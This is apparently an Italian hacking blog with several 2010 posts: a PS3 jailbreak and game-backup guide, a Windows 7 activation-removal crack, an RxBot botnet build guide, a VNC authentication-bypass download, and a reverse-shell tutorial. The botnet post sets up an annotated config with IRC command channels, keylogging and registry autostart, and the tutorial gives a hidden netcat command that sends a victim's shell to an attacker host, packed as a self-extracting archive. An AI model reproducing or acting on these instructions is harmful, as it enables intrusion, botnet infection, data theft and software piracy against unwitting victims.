GUIDA MODIFICA PS3

Posted in modifica psp3 on novembre 4, 2010 by ago1980

:: Cosa è il PS-Jailbreak?
Il PS-Jailbreak è un piccolo dispositivo (dongle) da collegare via USB alla PlayStation 3 che “trasforma” la console in una sorta di unità di debug (Dev-Mode) utilizzata dagli sviluppatori per testare i propri lavori: in pratica sulle normali PS3 Retail viene reso possibile l’esecuzione di codice non certificato come il “Backup Manager”.

.:: Cosa è il Backup Manager?
Il Backup Manager è una applicazione sviluppata dallo stesso team del PS-Jailbreak che permette di riversare il contenuto del supporto ottico DVD/BRD-Game sull’Hard Disk interno o su qualsiasi dispositivo di archiviazione collegato via USB alla console. Dallo stesso programma è inoltre possibile avviare le copie di backup dei giochi, precedentemente create, direttamente dall’HDD interno e/o esterno della PS3.

.:: Caratteristiche del PS-Jailbreak:
• Il PS-Jailbreak è una soluzione USB plug and play che si installa in un secondo e che non comporta l’invalidazione della garanzia.
• Facile da installare e utilizzare grazie ad una interfaccia grafica che guida l’utente passo-passo.
• Compatibile con tutte le versioni/revisioni/regioni della PS3 FAT e SLIM (USA, JAP, PAL e KOREA).
• il PS-Jailbreak disabilita la forzatura dell’aggiornamento firmware per l’avvio degli ultimissimi titoli videoludici.
• Supporta i giochi PS3 ma non permette l’avvio dei backups dei blue-ray video, dvd video e giochi PS1/PS2.
• Avvio dei backup dei giochi direttamente dall’HDD interno e/o esterno ed avvio diretto della GUI.
• Diminuzione dei tempi di caricamento dato che la velocità di lettura dagli HDD è maggiore (circa 2x) rispetto al lettore blue-ray. Questo elimina lags e glitches durante il gameplay.
• Consente di caricare applicazioni, backup di giochi commerciali e giochi homebrew da qualsiasi HDD/Flash USB collegato alla PS3.

.:: REQUISITI:
– PS3 con firmware 3.41
– Dongle PS-Jailbreak
– Backup Manager [link a breve] da copiare su qualsiasi dispositivo di archiviazione USB esterno collegato alla PS3 e formattato in FAT32.
– Hard Disk Esterno da collegare via USB alla PS3 (Opzionale)

.:: Preparazione della console e funzionamento del dongle:
– Assicurarsi che il lettore blue-ray della PS3 non contenga alcun disco.
– E’ necessario inserire il dongle PS-Jailbreak a PS3 spenta, quindi, a seconda della versione della console, sarà necessario:

Playstation 3 FAT: Spegnere la console utilizzando lo switch posteriore.
Playstation 3 SLIM: Scollegare il cavo di alimentazione dal retro della console.

– Scollegare eventuali periferiche USB e collegare a qualsiasi porta USB il dongle PS-Jailbreak.

– Premere il pulsante di accensione [POWER] della console premendo contemporaneamente per qualche secondo il tasto [EJECT].

Il dongle verra inizializzato e per circa 10 secondi resteranno accesi i 2 LED (rosso/verde):

successivamete resterà acceso solo il LED che ci informa sullo stato di funzionamento.

Si possono verificare 2 situazioni:

– Led rosso acceso –

il PS-Jailbreak non è stato caricato correttamente, generalmente questo accade quando non viene premuto adeguatamente il pulsante di espulsione del lettore [EJECT] o se è presente un disco nel lettore blue-ray della PS3.
Per risolvere il problema basta ripetere la procedura da capo prestando maggiore attenzione.

– Led verde acceso –

il PS-Jailbreak funziona correttamente.

– Collegare alla PS3 la periferica di archiviazione esterna USB contenente il “Backup Manager”

– Dal menu gioco della dashboard, aprire la cartella INSTALL PACKAGE FILES

– Posizionarsi sull’icona manager.pkg

– Premere il tasto X per avviare il processo di installazione dell’applicazione.
Il processo durerà pochi secondi al termine del quale comparirà nel menu Gioco della dashboard l’applicazione “Backup Manager”:

– Adesso, se non volete riversate il contenuto del Disco Gioco sull’hard disk interno della PS3, potete collegarne uno esterno ad una qualsiasi porta USB libera.

.:: Informazioni Utili:
• Il dispositivo funziona correttamente e senza problemi apparenti. Si devono ancora effettuare dei test approfonditi per rilevare eventuali limitazioni.
• Il firmware installato sulla PS3 deve essere il 3.41 perché i files del PS-Jailbreak sono stati ottimizzati per questa specifica versione di software di sistema. Potrebbe però funzionare anche su versioni firmware inferiori e/o superiori.
• Per la corretta attivazione/inizializzazione del PS-Jailbreak è necessario inserire il dongle a console spenta.
• Per la corretta attivazione/inizializzazione del PS-Jailbreak è necessario non aver alcun disco inserito nel lettore blue-ray della console.
• Per evitare danni alla macchina e al dongle è vivamente consigliato estrarre il PS-Jailbreak a console completamente spenta.
• L’hard disk della PS3 tende a surriscaldarsi quindi si consiglia di usare Hard disk esterni e/o chiavette USB.
• Anche se il Backup Manager è installato nella console è necessario che il dongle sia collegato e attivato correttamente altrimenti non si è in grado di eseguire le applicazioni non certificate come il Backup Manager.
• Rimuovendo il PS-Jailbreak dalla console non è più possibile caricare i backup, quindi è necessario ripetere il processo di attivazione/inizializzazione del dongle da zero. Backup Manager e dongle devono lavorare assieme.
• Se si avvia la console senza il PS-Jailbreak attivato correttamente (LED rosso) o senza collegarlo alla console, il programma “Backup Manager” non funzionerà restituendo l’errore 80029519.
• Il tempo impiegato per creare il backup varia da gioco a gioco. Per copiare i dati di “God of War 3” sull’HDD interno della console ci sono voluti circa 90 minuti mentre per “Red Dead Redemption” ne sono bastati 40.
• Se si esegue un backup da Gestione backup, non è possibile applicare le patch disponibili per il gioco (errore 80029567), ma se queste sono già state installate non c’è nessun problema.
• A causa della limitazione del FileSystem FAT32 i giochi che contengono files di grandezza superiore ai 4GB non possono essere avviati col PS-Jailbreak. “Red Dead Redemption” è uno di questi.
• Il backup di un gioco è costituito da una cartella principale riportante l’ID-GAME del gioco nella quale sono contenuti i file dati. E’ possibile esplorare il contenuto del backup direttamente dal PC.
• I backup creati col Backup Manager su una console possono essere eseguiti su qualsiasi altra console dotata di PS-Jailbreak.
• La modalità online dei giochi, allo stato attuale, funziona senza problemi.

.:: Creazione del backup del gioco:
Una volta avviato il Backup Manager dalla dashboard della PS3 comparirà il menu principale del programma.
La prima cosa da fare è inserire il disco gioco, di cui si vuole fare il backup, nel lettore della console.

– Selezionare l’icona di anteprima visualizzata:

– Premere il tasto O per iniziare il processo di backup del gioco.

E’ possibile selezionare la destinazione del backup scegliendo anche se copiarlo sull’hard disk interno della PS3 oppure in una periferica di archiviazione USB esterna.
E’ possibile eliminare la copia di backup gioco posizionandosi sulla relativa icona e cliccando il tasto
:: Avvio del backup del gioco:
Una volta eseguito il backup per avviarlo, si dovrà:

– Avere inserito un disco gioco qualsiasi nel lettore della PS3. Questo è necessario per il mounting virtuale del supporto e per emulare il processo di caricamento.

– Posizionarsi sull’icona del gioco e premere il tasto

Si uscirà dal programma e si ritornerà automaticamente sulla dashboard della PS3.

– Dal menu Gioco basterà posizionarsi sull’icona del disco che cambierà in quella del gioco selezionato e premere il tasto

Buon divertimento!
PS3 Firmware V3.41

Open Manager 1.161.pkg(2010.10.22)

FONTE:www.ps3-ita

Forum online..

Posted in Forum online on maggio 30, 2010 by ago1980

Salve a tutti ho aperto un forum che potete raggiungere

QUA’ scrivetevi in tanti e facciamo crescere il forum…

Rimuovere completamente il WAT

Posted in Rimuovere completamente il WAT on maggio 28, 2010 by ago1980

Volete craccare il vostro sistema operativo windows 7? Volete eliminare completamente il WAT (windows7 Activation Tecnology )? Ecco cosa fare.

Se non volete rendere il vostro Windows 7 genuino ma direttamente eliminare il WAT, eliminando alla radice il problema, oppure siete stati colti impreparati dall’aggiornamento di Windows7  KB971033, che è in grado di rilevare le versioni di  Windoes 7 “craccate”, vi consiglio di utilizzare questo programmino.

L’interfaccia è elementare. Non dovete fare altro che cliccare su “Remove WAT” e aspettare. Alla fine si riavvierà il sistema. Al riavvio avrete il vostro windows7 senza WAT.

Personalmente l’ho trovato molto utile per rimediare ai problemi dell’aggiornamento KB971033 che era riuscito a rilevare la “crack” che c’era nel mio sistema.

DOWNLOAD QUA’

fonte: hackerz

RXBOT (botnet)

Posted in BOTNET on maggio 13, 2010 by ago1980

————————————————————————————————————————–
BENVENUTI IN QUESTA ULTIMA MIA GUIDA DOVE VI SPIEGHERO’ … NEI PASSI PIU SEMPLICI POSSIBILI
COSA SIA UN RBOT, E QUALI CARATTERISTICHE LO COMBINANO…ANCHE PERCHE’ QUESTO FENOMENO SI STA
ESPANDENDO SEMPRE DI PIU ED E’ FRUTTO DI POTENTI ATTACCHI DENIAL OF SERVICE GRAZIE A VARIE
MACCHINE LINKATE TRA LORO…QUESTO MI FA RICORDARE MOLTO I CLIENT PER DDOS PER LINUX..
TIPO IL TRIBE FLOOD =) BUCAVI IL SERVER , TI LOGGAVI DENTRO , MONTAVI ROOTKIT , APRIVI PORTA
E LINKAVI COME MASTER AL CLIENT E QUESTO VIA DICENDO CON CENTINAIA DI UNIX ANCHE DETTE SHELL
MA QUESTA E’ UN ALTRA STORIA… ADESSO DOBBIAMO TRATTARE DI RBOT E NON DI CLIENT PER LINUX

{°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*}

APPROFONDIMENTI SULL’RB0T

{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}

COSA E’ UN RXB0T??? Sinceramente il vero nome attribuito a questo programma e’ rb0t perche’ oltre all’rx
ce ne sono altri tipo come URX,CRX,VRX,RX ecc ecc… Ogniuno con tale scopo.. Chi scanna,chi sniffa,chi dossa
ecc ecc!Questo trojan ha facile propagazione in tutta la rete locale.. e puo’ infettare qualsiasi piattaforma
windows dalla 95 alla XP… Per vista nn so se sia attaccabile e’ tutto da controllare..i suoi effetti sono
Duplicarsi all’infinito,modificare il registro di sistema, sfruttare molte vulnerabilita’ del sistema operativo
Sottrarre informazioni e avere pieno accesso del computer tramite una console guidata da IRC dall’attacker…
Fa una copia di se stesso utilizzando un nome file dalla lista a %­SYSDIR% Utilizzando uno dei seguenti nomi:
• logon.exe
• firewall.exe
• algs.exe
• explorer.exe
• Isass.exe
• iexplore.exe
• spoolsvc.exe
• winamp.exe
• csrs.exe
e subito dopo Cancella la copia di se stesso eseguita inizialmente.
Per assicurarsi la propria propagazione, il malware tenta di connettersi ad altre macchine come descritto qui sotto:
Fa più copie di se stesso nelle seguenti condivisioni di rete:
• c$windows
• c$winnt
• d$shared
• e$shared
• print$
• IPC$
• admin$
• admin$system32
Utilizza le seguenti informazioni di login per aprirsi l’accesso alla macchina remota,
Nomi Utente e Password presenti nella cache.
Ma quali exploit sfrutta questo trojan????? eccovi la lista =)

Sfrutta la seguente vulnerabilità:

– MS03-007 (Unchecked Buffer in Windows Component)
– MS03-026 (Buffer Overrun in RPC Interface)
– MS04-007 (ASN.1 Vulnerability)
– MS04-011 (LSASS Vulnerability)
– MS05-039 (Vulnerability in Plug and Play)

In piu’ Crea degli indirizzi IP casuali mentre mantiene i primi due ottetti dal proprio indirizzo. In seguito prova a stabilire
una connessione con gli indirizzi creati.

*Linguaggio di programmazione:
Il malware è stato scritto in MS Visual C++.
Per complicarne l’individuazione e ridurre la dimensione del file, viene compresso con il seguente software di compressione:
• AS Protect 1.2

{°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*}

ViSUAL C++

{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}

Il visual c++ e’ un programma per scrivere programmi in c… questo molto utilizzato su piattaforme windows…
Questo e’ il programma ke andremo ad utilizzare per compilare il nostro src dell’rb0t.. reperibile da qualsiasi
programma P2P come ad ad esempio TORRENT oppure il nostro amato EMULE… basta scrivere
Visual C+ 6.0 ENTERPRISE sono circa 600mb a CD ne dovrebbero essere un paio 6 credo… ma nn ne sono sicuro =)

{°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*}

COMPILAZIONE

{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}

Finalmente direte voi! dopo tanto rompimento di balle sulla spiegazione di questo virus siamo riusciti
finalmente ad arrivare alla compilazione! Quello che a tutti noi interessa… bene allora senza
altri intralci iniziamo subito! ^^

Allora scarichiamo o procuriamoci questi programmi…

-Visual C++ ENTERPRISE ( programma fondamentale per la compilazione dell rbot )
-Librerie SDK ( librerie fondamentali per la compilazione )
-Service pack 6 ( aggiornamento al visual c++ .. per intenderci piu aggiornato e’ meglio e’! )
-Src Rb0t ( Un source qualsiasi di un rxb0t ,

LINK UTILI…

Service pack 6.0 ( http://www.microsoft.com/downloads/details.aspx?familyid=A8494EDB-2E89-4676-A16A-5C5477CB9713&displaylang=it )

/ATTENZIONE/:

Ci sono rxbot nn cripatati e quindi ke devono essere compilati normalmente a caratteri normali
invece ci sono alcuni che vengono compialti criptati… ma questo credo che ne riparleremo
nella prossima Guida….

Allora per prima cosa dopo aver installato tutto! Mettete tutti i src dell’rx bot in una cartella
che poi tratteremo…
Aprite il Visual e andate nel pannello delle impostazioni ovvero ” OPTIONS ”
Dirigiamoci su “DIRECTORIES ” e selezioniamo EXECUTABLE FILES dove andremo ad inserire la
prima libreria dell SDK ovvero la BIN!
Cliccate 2 volte in basso alla finestrella dove appaiono le due “..” e diciamogli di
indirizzarci sulla PATH O meglio DIRECTORY dove e’ situato la libreria dell SDK ovvero
C:PROGRAM FILESMICROSOFT SDKBIN
fatto cio… facciamo lo stesso con le seguenti voci…
-Executable files ( C:PROGRAM FILESMICROSOFT SDKBIN )
-Include files ( C:PROGRAM FILESMICROSOFT SDKINCLUDE )
-Library files ( C:PROGRAM FILESMICROSOFT SDKLIB )

Una volta fatto andiamo nella cartella dove abbiamo il sorgente dell rx e apriamo il file .dsw
e ora dobbiamo cercare il file config.h dove setteremo tutte le nostre impostazioni su dove
mettersi in ascolto il nostro trojan , su quale canale joinare e tutte le altre cose…
Quindi… si passa al prossimo capitolo!
ANALISI Config.h

{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}

PRENDO IN ESEMPIO UN RX MOLTO VALIDO E BUONO LA CARA E VEKKIA MOD DI “DoS Resilient RPMiSO”
OK il config si presenta cosi

// Good shit Mod By DoS Resilient RPMiSO !
// bot configuration (generic) – doesn’t need to be encrypted
int port = 6667;                                // “Questa e’ la porta del server IRC”
int port2 = 7000;                                // ” In caso la porta fosse chiusa usa un’altra”
int socks4port = 1980;                        // Port # Questo da utilizzare se usiamo Sock
int tftpport = 69;                                // Port # questa e’ la porta del demone ftp
int httpport = 84;                        // Port # questa e’ la porta del demone http
int rloginport = 5004;                        // Port # questa e’ la porta del demone rlogin
BOOL topiccmd = TRUE;                        // Qua settiamo se il bot deve autosettare il topic
BOOL rndfilename = FALSE;                // Comando per mettere un nick random al bot
BOOL AutoStart = TRUE;                        // Abilita l’autostart del registro
char prefix = ‘-‘;                                // il comando che verra’ dato al bot sara’ -comando
int maxrand = 6;                                // Numeri random ke verranno dati al bot preceduto dal nick
int nicktype = COUNTRYNICK;                // nick type
BOOL nickprefix = TRUE;                        // nick uptime & mirc prefix

#ifdef DEBUG_LOGGING
char logfile[]=”c:\r0fl.txt”;
#endif

#ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!

#else  // Recommended to use this only for Crypt() setup, this is unsecure.

char botid[] = “BoT”;                                                // Qua verra’ messo l’id del bot
char version[] = “[rxBot ItalianMod by DoS|ResilienT|RPMISO”;                // Il nome della Mod =) non modificare =)
char password[] = “Tuapass”;                                        // la password ke verra’ loggata dal bot
char server[] = “irc.flashirc.org”;                // qua mettiamo il nostro server irc dove joinera’ il bot
char serverpass[] = “”;                                                // se il server ha una password settiamola
char channel[] = “#Tuocanale”;                                // Qua inseriamo il canale dove joinera’ il bot
char chanpass[] = “tuakey”;                                        // qui metteremo la password o meglio +K se il chan a password
char server2[] = “irc2.flashirc.org”;                                // in caso di down server settiamo un altro irc server (optional)
char channel2[] = “#tuocanale”;                                                // in caso il chan fosse non disponibile (optional)
char chanpass2[] = “tuakey”;                                                // password dell’altro chan =) settato da noi (optional)
char filename[] = “Sygate.exe”;                        // nome che daremo al processo che si vedra’ nella TASK MANAGER
char keylogfile[] = “Allarm.txt”;                                // fILE name del Keylogger
char valuename[] = “Sygate Personal Firewall”;                // value name per l’autostart ( dal registro di sistema )
char nickconst[] = “”;                                        // first part to the bot’s nick
char szLocalPayloadFile[]=”msconfig.dat”;        // Payload filename
char modeonconn[] = “+n+B”;                                        // Can be more than one mode and contain both + and –
char exploitchan[] = “#tuocanale”;                                        // mettiamo il nostro chan per visualizzar l’exploitazione
char keylogchan[] = “#tuocanale”;                                                // mettiamo il nostro chan per visualizzar il keyloger
char psniffchan[] = “#tuocanale”;                                                // mettiamo il nostro chan per visualizzar lo sniffing =)

char *authost[] = {
“*@*”, <—– SETTIAMO QUI *@* cosi qualunque HOST potra loggarsi in caso avete un bnc mettete *HOSTBNC* =)
};

char *versionlist[] = {
“”
};

char regkey1[]=”Software\Microsoft\Windows\CurrentVersion\Run”; —> path dove si andra’ ad inserire il bot
char regkey2[]=”Software\Microsoft\Windows\CurrentVersion\RunServices”; –> path dove si andra’ ad inserire il bot
char regkey3[]=”Software\Microsoft\OLE”; –> path dove si andra’ ad inserire il bot
char regkey4[]=”SYSTEM\CurrentControlSet\Control\Lsa”; –> path dove si andra’ ad inserire il bot

#endif

#ifdef PLAIN_CRYPT
char key[16] = “i0r0xx0″; // CHANGE THIS!!! hmmm..Do I even need this now?
#endif

BENE UNA VOLTA COMPILATO COME SEGUE QUESTO FILE CLICCATE IN ALTO SU BUILD E SUBITO DOPO rbot.exe E VI CREERA’ UN
FILE rb0t.exe NELLA CARTELLA SPECIALE DELL’RX… DOPODICHE LA PACKERETE CON UN QUALSIASI PACKER ” DECENTE ”
E SARETE PRONTI AD INFETTARE TUTTE LE MACCHINE POSSIBILE INIMAGINABILI PER WINDOWS….

TUTTO IL MATERIALE LO TROVATE ——–>QUA’

ECCO IL VIDEO…

Bypassare Versioni di VNC. 4.1.x

Posted in Bypassare Vnc on aprile 21, 2010 by ago1980

Ecco come bypassare vnc.4.1.x

DOWNLOAD bypauth : linux

DOWNLOAD bypauth : windows


Revers Shell

Posted in Revers Shell on marzo 23, 2010 by ago1980

revers shell

Una reverse shell è un tipo di attacco che permette di ottenere il prompt dei comandi di un sistema remoto con diritti amministrativi.

A differenza di una “direct shell”, non è chi attacca che si collega al pc-vittima. Sarà bensì il pc-vittima che si collegherà al pc di chi attacca, fornendogli il prompt dei comandi.

Questo consente di ovviare ai già discussi problemi di “pass-through”, ossia riuscire a sorpassare firewall, router e quant’altro blocchi le connessioni in ingresso verso il pc-vittima.

Il tutorial che segue cercherà di spiegare come impostare una reverse shell per ottenere il controllo del prompt dei comandi di sistemi remoti basati su Windows.

Strumenti necessari:

NetCat (nc.exe, network utility che permette di agganciare programmi in riga di comando e redirezionare l’input e l’output da e verso un sistema remoto)
WinRar (software utility di compressione / decompressione archivi; utilissimo per creare i famigerati archivi autoestraenti)
Editor del Registro di sistema (reg.exe, software utility di editazione del registro di windows da riga di comando)
WebGet (wget.exe, network utility che permette di scaricare qualsiasi file via HTTP o FTP direttamente da riga di comando)

Prerogative:

Iscrizione ad un servizio di DNS dinamici (tipo DynDNS, No-IP, etc.)
Installazione di un client Updater di DNS dinamici sul proprio PC
Apertura di una porta TCP (liberamente scelta) sul firewall del proprio PC
Eventualmente (se ci si collega ad internet con un router), forward della porta TCP che è stata scelta, dal router al proprio PC Client.

– PARTE 1 – Preparazione del proprio PC

Si inizia con l’iscrizione al servizio di DNS dinamici. I DNS dinamici sono necessari per poter “ritrovare” il nostro pc in internet senza dover ogni volta andare a controllare il nostro IP pubblico (che cambia, di tanto in tanto, essendo un IP dinamico).

In questo esempio si userà il servizio fonito da DynDNS.org [http://www.dyndns.org].
CREAZIONE HOST DYNDNS

Recarsi sul sito http://www.dyndns.org ed effettuare un’iscrizione.
Una volta iscritti e verificati, recarsi nella sezione “My services” e cliccare il link “add hostname” in prossimità della sezione “Host Services”.
Qui avrete la possibilità di scegliervi una specie di dominio di terzo livello. Dovrete scegliere, dal menu a tendina sulla destra, un “suffisso” (ce ne sono diversi, dyndns.org, blogsite.org, kick-ass.org, etc.). Scegliete quello che più vi aggrada. In quest’esempio ho scelto “kick-ass.org”.
A questo punto, è necessario scegliere un “prefisso”, che starà prima di kick-ass.org. In questo esempio io ho scritto “shell”, in modo da formare il dominio di terzo livello shell.kick-ass.org.
Poi, cliccate sul link “Use auto detected IP address xxx.xxx.xxx.xxx” che c’è sotto. Questo farà in modo che il dominio che si sta per creare punterà subito all’IP della vostra connessione ad internet.
Ora potete cliccare il bottone “Create Host”, per confermare la creazione del vostro DNS dinamico.

(naturalmente, il servizio suddetto è del tutto gratutito. DynDNS offre anche servizi “premium” a pagamento, ma per quello di cui abbiamo bisogno ci và più che bene il servizio base gratuito).

INSTALLAZIONE DYNDNS UPDATER SUL PROPRIO PC

Ora che abbiamo registrato correttamente il nostro host e l’abbiamo sincronizzato al nostro attuale indirizzo IP, abbiamo bisogno di installare un software “updater” che faccia in modo che ogni volta che il nostro IP cambia l’host shell.kick-ass.org venga risincronizzato con il nuovo IP.

DynDNS offre un client gratuito. Recatevi su https://www.dyndns.com/support/clients/ e cliccate il link “Download Now” che è presente sulla destra. In questo modo scaricherete il software DynUpSetup.exe.

Eseguite il setup e premete “next” fino ad arrivare alla schermata “Install as a service”. Qui raccomando di mettere il segno di spunta sulla casella “Install the DynDNS Updater as a Windows Service”. In questo modo, l’updater sarà installato come un servizio di windows, e si avvierà automaticamente fornendovi una sincronizzazione dell’IP completamente automatica.
Al termine dell’installazione, si aprirà una schermata che vi chiede le informazioni del vostro account DynDNS (nome utente e password). Inserite i dati e vedrete che il programma aggiungerà il nome host shell.kick-ass.org all’interno della finestra. Cliccate il quadratino in prossimità del nome host per impostare la sincronizzazione. Ora cliccate il bottone “OK” e il gioco è fatto.

SCELTA DELLA PORTA TCP DA USARE PER LE CONNESSIONI E RELATIVA APERTURA SUL FIREWALL DI WINDOWS

A questo punto è necessario decidere quale porta TCP usare per accettare le connessioni in ingresso delle future vittime.

Qualsiasi porta puo’ andar bene.. Ovviamente, conviene scegliere una porta “poco sospetta”, dove nessun eventuale curiosone andrebeb a cercare eventuali servizi in ascolto.
A tal proposito, direi che una qualsiasi porta TCP dalla 40000 alla 50000 può andar bene.
Nel nostro esempio useremo la porta TCP 43712 (e sfido qualsiasi curiosone ad immaginare che su quella porta ci giri un servizio!).

Recatevi sul pannello di controllo del vostro PC, cliccate l’icona “Widnows Firewall”, recatevi sulla scheda “eccezioni” (se usate Vista, prima dovete cliccare sul link “Modifica impostazioni”) e cliccate il bottone “Aggiungi porta”.
A questo punto inseriremo: come nome porta “revshell” (ovviamente è solo un esempio), come numero porta 43712, come protocollo TCP.
Ora potete premere “OK” e di nuovo “OK”. Il firewall di windows è stato correttamente impostato per lasciar passare le connessioni in ingresso sulla porta TCP 43712.

Se vi connettete ad internet tramite modem USB o modem Ethernet (in questo caso, di solito ci si connette con username e password direttamente da windows) siete pronti così e non avete bisogno di ulteriori passaggi per configurare le connessioni in ingresso.

PER CHI USA UN ROUTER PER CONNETTERSI AD INTERNET, PORT-FORWARD

Chi usa un router (che sia cablato o wireless, non fà differenza) ha bisogno di un ulteriore passaggio per accettare connesisoni in ingresso.
Sarà necessario impostare un port-forwarding dalla porta TCP 43712 del router alla porta TCP 43712 del proprio PC client.
Per capirci, se usate emule con un router non configurato, incapperete nel famoso problema dell’ID basso (l’iconcina del mulo ha una benda nera sugli occhi). E’ esattamente la stessa situazione in cui ci troviamo noi con questa guida.
Siccome l’apertura delle porte sui router non è una procedura standard (cambia a seconda del modello di router) vi rimando alla pagina di help di emule-italia, dov’è presente una guida per il port forwarding e vari esempi per vari modelli di router: http://www.emule.it/guida_emule/config_porte/routers.asp

Seguite la guida ricordandovi di effettuare la configurazione per la porta TCP 43712 (la parte relativa alla porta UDP la potete tranquillamente saltare).

– PARTE 2 – Preparazione del “pacchetto sorpresa” da inviare alla vittima

In questa fase vedremo come preparare l’archivio autoestraente da inviare alla vittima; inseriremo nel pacchetto tutti i programmi fondamentali per prendere il controllo del PC e “agganciarsi” ad esso con unghie e denti.

DOWNLOAD DEGLI STRUMENTI

NetCathttp://joncraton.org/files/nc111nt.zip
[ Non esiste nessuna homepage dove scaricare il NetCat per Windows, il link l’ho trovato direttamente su wikipedia, qui: http://en.wikipedia.org/wiki/Netcat
Inoltre, NetCat è un hacking tool; ciò significa che di per sé è innocuo, ma se usato da un hacker per scopi maliziosi, diventa un potente strumento di controllo remoto; pertanto, alcuni antivirus (tra i quali Kaspersky e Norton) lo rilevano come “potenzialmente pericoloso” ]

WinRarhttp://www.rarlab.com/rar/wrar380b4it.exe
[ Famosissimo programma di gestione archivi. Il link in alto è per la versione 3.80 beta 4 in Italiano. Se si desidera installare una versione diversa, rimando alla homepage http://www.rarlab.com ]

Reg.exe [editor del registro]http://www.dynawell.com/download/reskit/mi…win2000/reg.zip
[ Editor del registro di sistema di Windows da riga di comando. La versione linkata è quella contenuta nel Resource Kit per Windows 2000. In windows XP (credo anche in Vista) il comando reg.exe dovrebbe essere presente di default nel sistema operativo. Io lo includo nel pacchetto per ovviare a qualsiasi evenienza ]

WebGethttp://users.ugent.be/~bpuype/cgi-bin/fetc…l=wget/wget.exe
[ Port per Win32 del programma fondamentale webget (di default si trova in qualsiasi distribuzione di Linux / Unix). Il programma permette di effettuare download di files via HTTP o FTP direttamente da riga di comando ]

Create una cartella da qualche parte (sul Desktop?) chiamata “revshell”; scaricate tutti gli strumenti sopraelencati, e copiate gli eseguibili “nc.exe”, “reg.exe” e “wget.exe” all’interno della cartella revshell. Installate WinRar.

Il contenuto della cartella dovrà essere il seguente:

– revshell:
–> nc.exe
–> reg.exe
–> wget.exe

Adesso, sarà necessario creare uno script batch (io uso il VBScript per creare i batch, probabilmente si può fare anche con i semplici “.BAT”, ma da lì non so come eseguire programmi in modalità nascosta…).

Aprite il blocco note e incollate all’interno queste 2 righe di codice:

CODICE

Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “nc.exe -e cmd.exe shell.kick-ass.org 43712”, 0

Cosa vuol dire quel codice?
Lo script in VBS esegue il programma nc.exe, agganciandogli (-e) il prompt dei comandi (cmd.exe) e gli dice di connettersi verso l’host shell.kickass.org sulla porta 43712. Lo zero alla fine serve a specificare che il prog deve essere eseguito senza mostrare la finestra (hehe).

Salvate il file come “revshell.vbs” (mi raccomando l’estensione “vbs”) e piazzatelo nella cartella “revshell” insieme agli altri 3 EXE.

CREAZIONE DEL PACCHETTO AUTO-ESTRAENTE

Ora, selezionate tutti e quattro i files (3 .exe e 1 .vbs), cliccate col tasto destro sulla selezione e scegliete “Aggiungi ad un archivio” dal menu contestuale.

Si aprirà la finestra di creazione archivi di WinRar.

Mettete subito il segno di spunta su “Crea un archivio autoestraente”:

A questo punto passate alla scheda “Avanzati” e cliccate il bottone “Modulo auto-estraente”.
Si aprirà un’ulteriore finestra.

Mettete,
“percorso d’estrazione”: ../windows/system32/sys
“esegui dopo l’estrazione”: revshell.vbs

Poi, passate alla scheda “Avanzate” e mettete il segno di spunta su “Richiedi l’accesso come amministratore”.

Poi, passate alla scheda “Modalità” e scegliete “Nascondi tutto” e “Sovrascrivi tutti i file già esistenti”.

Opzionalmente, potete recarvi sulla scheda “Testo iniziale ed icone” e scegliere un icona personalizzata cliccando il bottone “sfoglia” in prossimità di “carica l’icona dal file”.

Fatto questo, premete il bottone “OK”, di nuovo “OK” e verrà creato il file “revshell.exe” nella cartella revshell

Il pacchetto è pronto per essere inviato.

– PARTE 3 – Mettere NetCat in ascolto sul PC locale

CREAZIONE DEL BATCH PER L’ESECUZIONE LOCALE DI NETCAT

Per poter accettare la connessione reverse del pc vittima, sarà necessario mettere in ascolto NetCat sul nostro PC locale. Avendo già impostato i DNS dinamici, avendo già aperto le porte sul firewall (ed eventualmente avendo anche forwardato la porta sul router), il nostro PC è perfettamente equipaggiato per accettare le connessioni in ingresso sulla porta TCP 43712.

Recatevi nella cartella revshell e create un nuovo file di testo, chiamandolo “nc_locale.cmd” (mi raccomando l’estensione “.cmd”. In alternativa si può usare l’estensione “.bat”; non c’è differenza, l’importante è che non lasciate il “.txt”).

Aprite il file e scriveteci dentro:

CODICE

nc.exe -v -L -p 43712

Cosa significa quel codice? Quel codice lancia NetCat sul vostro PC con lo switch “verbose” (-v, significa che “chiacchiererà” parecchio), lo mette in modalità “ascolto” (-L, in inglese “Listening”) sulla porta 43712 (-p 43712).

Salvate il file.

– E ADESSO FACCIAMO PARTIRE IL TUTTO –

Per prima cosa, cliccate il file “nc_locale.cmd” della cartella revshell del vostro computer. Si aprirà una shell con NetCat che attende una connessione in ingresso.

Adesso, inviate il pacchetto “revshell.exe” (magari cabiate il nome C_C ) alla vostra vittima e fate in modo che lo esegua.

Se tutto va bene (e per “va bene” intendo dire che la “vittima” non abbia in uso Norton Antivirus o Kaspersky, che ahimé, intercettano nc.exe come “hacking tool”) dovrebbe comparire il prompt dei comandi del pc vittima direttamente sul vostro schermo, esattamente dove avevamo lasciato NetCat in ascolto.

Ora che avete il prompt remoto, teoricamente potete fare qualsiasi cosa: con wget potete far scaricare alla vittima qualsiasi programma, ed eseguirlo da remoto. Con reg.exe potete editare il registro di sistema remoto per aggiungere, rimuovere chiavi di registro. Col comando “tasklist.exe” potete visualizzare la lista dei processi in esecuzione sul pc remoto, e col comando “taskkill.exe” li potete terminare… Eccetera, eccetera

Netcat traferimento di file…

Posted in Netcat on marzo 6, 2010 by ago1980

Questa caratteristica di netcat può essere utile in diversi casi. Può essere il modo più semplice e veloce per passare file tra due computer senza dover attivare condivisioni o installare servizi. Oppure durante un penetration test o durante un’intrusione può essere molto utile portare velocemente sul computer sotto attacco  trojan, rootkit o altri strumenti; oppure può essere necessario esfiltrare file senza lasciare tracce nei log. Un altro punto forte di questa tecnica è la diffusione di netcat sulle macchine Unix/Linux. Se si deve portare dei file su un Linux in rete senza troppi problemi si può utilizzare netcat.

La tecnica è abbastanza semplice: si usano due netcat, uno sulla macchina sorgente e uno sulla macchina di destinazione. Quest’ultimo avrà la funzione di server.

